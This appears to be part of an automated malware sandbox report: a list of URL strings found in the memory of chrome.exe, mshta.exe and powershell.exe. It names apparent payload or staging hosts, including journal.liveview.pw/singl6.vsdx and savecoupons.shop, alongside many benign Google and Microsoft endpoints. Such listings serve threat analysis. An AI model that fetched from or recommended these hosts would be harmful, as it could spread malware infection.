                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
                    Source: chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
                    Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
                    Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                    Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                    Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugsp_
                    Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                    Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
                    Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
                    Source: powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://journal.liveview.pw
                    Source: powershell.exe, 00000006.00000002.57162749245.0000000004590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://journal.liveview.pw/singl6.vsdx
                    Source: powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://journal.liveview.pw/singl6.vsdx4
                    Source: chrome.exe, 00000009.00000002.57300353725.0000781C03920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228652650.0000781C03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                    Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
                    Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                    Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                    Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                    Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                    Source: chrome.exe, 00000009.00000002.57289152036.0000781C02990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286804233.0000781C02448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286034469.0000781C0232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: chrome.exe, 00000009.00000002.57296232095.0000781C033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286034469.0000781C0232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/0
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/0BJP
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
                    Source: mshta.exe, 00000002.00000002.56249468249.0000000003198000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.0000000003196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comt
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/ebapp
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
                    Source: chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292045866.0000781C02D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                    Source: chrome.exe, 00000009.00000002.57293738861.0000781C03020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                    Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                    Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-emailp_
                    Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                    Source: chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
                    Source: powershell.exe, 00000003.00000002.56221594211.000000000583E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                    Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287173425.0000781C02544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.com/setup
                    Source: chrome.exe, 00000009.00000002.57287788903.0000781C02664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287460063.0000781C02591000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300950290.0000781C03A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                    Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                    Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                    Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
                    Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
                    Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
                    Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
                    Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
                    Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
                    Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
                    Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
                    Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295825106.0000781C03324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
                    Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0BJ
                    Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlndler7
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
                    Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXEr
                    Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
                    Source: chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                    Source: chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                    Source: chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                    Source: chrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com/
                    Source: mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/
                    Source: powershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savecoupons.shop/si
